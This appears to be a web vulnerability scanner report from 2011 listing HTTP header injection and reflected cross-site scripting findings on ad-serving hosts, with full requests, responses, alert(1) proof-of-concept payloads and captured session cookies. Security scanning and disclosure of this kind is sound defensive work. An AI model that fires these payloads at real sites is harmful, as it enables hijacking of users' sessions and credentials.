2.15. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/music/_mn [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mtv.mtvi/btf_j_s/music/_mn

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2c8a0%0d%0a598aa37f06f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2c8a0%0d%0a598aa37f06f/mtv.mtvi/btf_j_s/music/_mn;sec0=music;sec1=_mn;!category=expand;!category=float;node=survey;pos=btf;tag=adj;mtype=standard;sz=300x250;tile=3;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;u=!category-expand%7C!category-float%7Cnode-survey%7Cpos-btf%7Ctag-adj%7Cmtype-standard%7Csz-300x250%7Ctile-3%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774;ord=927227632701397000? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/music/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2c8a0
598aa37f06f/mtv.mtvi/btf_j_s/music/_mn;sec0=music;sec1=_mn;!category=expand;!category=float;node=survey;pos=btf;tag=adj;mtype=standard;sz=300x250;tile=3;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;d:
Date: Tue, 14 Jun 2011 00:18:06 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
3. Cross-site scripting (reflected)  previous  next
There are 74 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

3.1. http://ad.doubleclick.net/adi/N5155.152847.2342166290621/B5116932.9 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5155.152847.2342166290621/B5116932.9

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3f1d"-alert(1)-"349fca594e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5155.152847.2342166290621/B5116932.9;sz=728x90;ord=156694210?click=http://viacom.adbureau.net/accipiter/adclick/CID=0000040d0000000000000000/acc_random=379297/site=mtv.mtvi/aamsz=728x90/relocate=http://clk.atdmt.com/goiframe/200193601.202770770/mtvnsdrv0010001173apm/direct/01%3fhref=&e3f1d"-alert(1)-"349fca594e1=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6563
Date: Tue, 14 Jun 2011 00:17:24 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ureau.net/accipiter/adclick/CID=0000040d0000000000000000/acc_random=379297/site=mtv.mtvi/aamsz=728x90/relocate=http://clk.atdmt.com/goiframe/200193601.202770770/mtvnsdrv0010001173apm/direct/01%3fhref=&e3f1d"-alert(1)-"349fca594e1=1http%3a%2f%2fwww.teleflora.com/%3Fsrccode%3Dme_msnret_bt_ev11_ros_728x90%26promotioncode%3Dmeed15");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dca
...[SNIP]...
3.2. http://ad.doubleclick.net/adi/N5155.152847.2342166290621/B5116932.9 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5155.152847.2342166290621/B5116932.9

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac46f"-alert(1)-"b4f7ed4dde6 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5155.152847.2342166290621/B5116932.9;sz=728x90;ord=156694210?click=http://viacom.adbureau.net/accipiter/adclick/CID=0000040d0000000000000000/acc_random=379297/site=mtv.mtvi/aamsz=728x90/relocate=http://clk.atdmt.com/goiframe/200193601.202770770/mtvnsdrv0010001173apm/direct/01%3fhref=ac46f"-alert(1)-"b4f7ed4dde6 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6509
Date: Tue, 14 Jun 2011 00:16:59 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
bureau.net/accipiter/adclick/CID=0000040d0000000000000000/acc_random=379297/site=mtv.mtvi/aamsz=728x90/relocate=http://clk.atdmt.com/goiframe/200193601.202770770/mtvnsdrv0010001173apm/direct/01%3fhref=ac46f"-alert(1)-"b4f7ed4dde6http://www.teleflora.com/?srccode=me_msnret_bt_ev11_ros_728x90&promotioncode=meed15");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess
...[SNIP]...
3.3. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front [;s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/tech_front

Issue detail

The value of the ;s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54b9f"style%3d"x%3aexpression(alert(1))"10025daa06f was submitted in the ;s parameter. This input was echoed as 54b9f"style="x:expression(alert(1))"10025daa06f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/tech_front;;s=8_10001;mc=b2pfreezone;tile=2;sz=377x140;ord=4904490449044904;54b9f"style%3d"x%3aexpression(alert(1))"10025daa06f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 552
Date: Tue, 14 Jun 2011 00:14:08 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b26/0/0/%2a/h;215935200;4-0;0;15527176;29332-377/140;38766070/38783827/1;;~okv=;;s=8_10001;mc=b2pfreezone;tile=2;sz=377x140;54b9f"style="x:expression(alert(1))"10025daa06f;bsg=122689;bsg=122690;;~aopt=6/1/ff/1;~sscs=%3fhttp://sales-jobs.fins.com/?reflink=djm_bcu_sales_x140">
...[SNIP]...
3.4. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/tech_front

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22602"style%3d"x%3aexpression(alert(1))"b75c91509da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 22602"style="x:expression(alert(1))"b75c91509da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/tech_front;;s=8_10001;mc=b2pfreezone;tile=2;sz=377x140;ord=4904490449044904;&22602"style%3d"x%3aexpression(alert(1))"b75c91509da=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 522
Date: Tue, 14 Jun 2011 00:15:03 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b26/0/0/%2a/u;215935200;5-0;0;15527176;29332-377/140;37749806/37767658/1;;~okv=;;s=8_10001;mc=b2pfreezone;tile=2;sz=377x140;&22602"style="x:expression(alert(1))"b75c91509da=1;bsg=122689;bsg=122690;;~aopt=6/1/ff/1;~sscs=%3fhttp://www.wsjwine.com/2861003">
...[SNIP]...
3.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f96e5</script><script>alert(1)</script>74733bd38c5 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172?click=http://global.ard.yahoo.com/SIG=15lkbuhbo/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307981483/L=bC9ZKmKL8NLm3NorTdAdCxM0rcHW8032GosAA2uT/B=SnIAKmKL5WA-/J=1307974283257435/K=WV.FHM_EsyZAV7OsrCOkmw/A=6304414/R=0/*f96e5</script><script>alert(1)</script>74733bd38c5 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=46:1354:804:44:0:44377:1307970673:B2|46:1354:804:44:0:44375:1307967073:B2|46:1354:804:44:0:48594:1307963457:L

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 14:11:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2519

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
uhbo/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307981483/L=bC9ZKmKL8NLm3NorTdAdCxM0rcHW8032GosAA2uT/B=SnIAKmKL5WA-/J=1307974283257435/K=WV.FHM_EsyZAV7OsrCOkmw/A=6304414/R=0/*f96e5</script><script>alert(1)</script>74733bd38c5">
...[SNIP]...
3.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f733d</script><script>alert(1)</script>8a02258715a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172?click=http://global.ard.yahoo.com/SIG=15lkbuhbo/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307981483/L=bC9ZKmKL8NLm3NorTdAdCxM0rcHW8032GosAA2uT/B=SnIAKmKL5WA-/J=1307974283257435/K=WV.FHM_EsyZAV7OsrCOkmw/A=6304414/R=0/*&f733d</script><script>alert(1)</script>8a02258715a=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=46:1354:804:44:0:44377:1307970673:B2|46:1354:804:44:0:44375:1307967073:B2|46:1354:804:44:0:48594:1307963457:L

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 14:11:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2525

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
hbo/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307981483/L=bC9ZKmKL8NLm3NorTdAdCxM0rcHW8032GosAA2uT/B=SnIAKmKL5WA-/J=1307974283257435/K=WV.FHM_EsyZAV7OsrCOkmw/A=6304414/R=0/*&f733d</script><script>alert(1)</script>8a02258715a=1">
...[SNIP]...
3.7. http://api.bizographics.com/v1/profile.json [&callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload 5638e<script>alert(1)</script>c0fe4a3a74d was submitted in the &callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData5638e<script>alert(1)</script>c0fe4a3a74d&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe1h0yfLwyxARVExkNK7HUtFp4B4dlWpgdhb8ERjlseVzj8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjv3LIcisLQsnJDisGQdUK2D6ztJRFsRyXovJAo8OukxqBLBWr1XIQIIGVWAglyTqlNGtBiitkUr3XlAiscQyzlKxEyj6p6QYsvgf51m9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqk84Nzl6iivmHYAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Tue, 14 Jun 2011 00:14:23 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe2JxzTwGAeDvFExkNK7HUtFp4B4dlWpgdiilmSbD5NislZj8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VeiiLshipt0u7449JRFsRyXovJtAis5nbdyl7dWr1XIQIIGVUpXyUhXA0M0BiitkUr3XlAiscQyzlKxEyj6p6QYsvgf51m9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqk84Nzl6iivmHYAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 552
Connection: keep-alive

dj.module.ad.bio.loadBizoData5638e<script>alert(1)</script>c0fe4a3a74d({"bizographics":{"location":{"code":"texas","name":"USA - Texas"},"industry":[{"code":"business_services","name":"Business Services"}],"functional_area":[{"code":"it_systems_analysts","name":"IT Syste
...[SNIP]...
3.8. http://api.bizographics.com/v1/profile.json [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload baefe<script>alert(1)</script>f74b73704e0 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvunbaefe<script>alert(1)</script>f74b73704e0 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe1h0yfLwyxARVExkNK7HUtFp4B4dlWpgdhb8ERjlseVzj8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjv3LIcisLQsnJDisGQdUK2D6ztJRFsRyXovJAo8OukxqBLBWr1XIQIIGVWAglyTqlNGtBiitkUr3XlAiscQyzlKxEyj6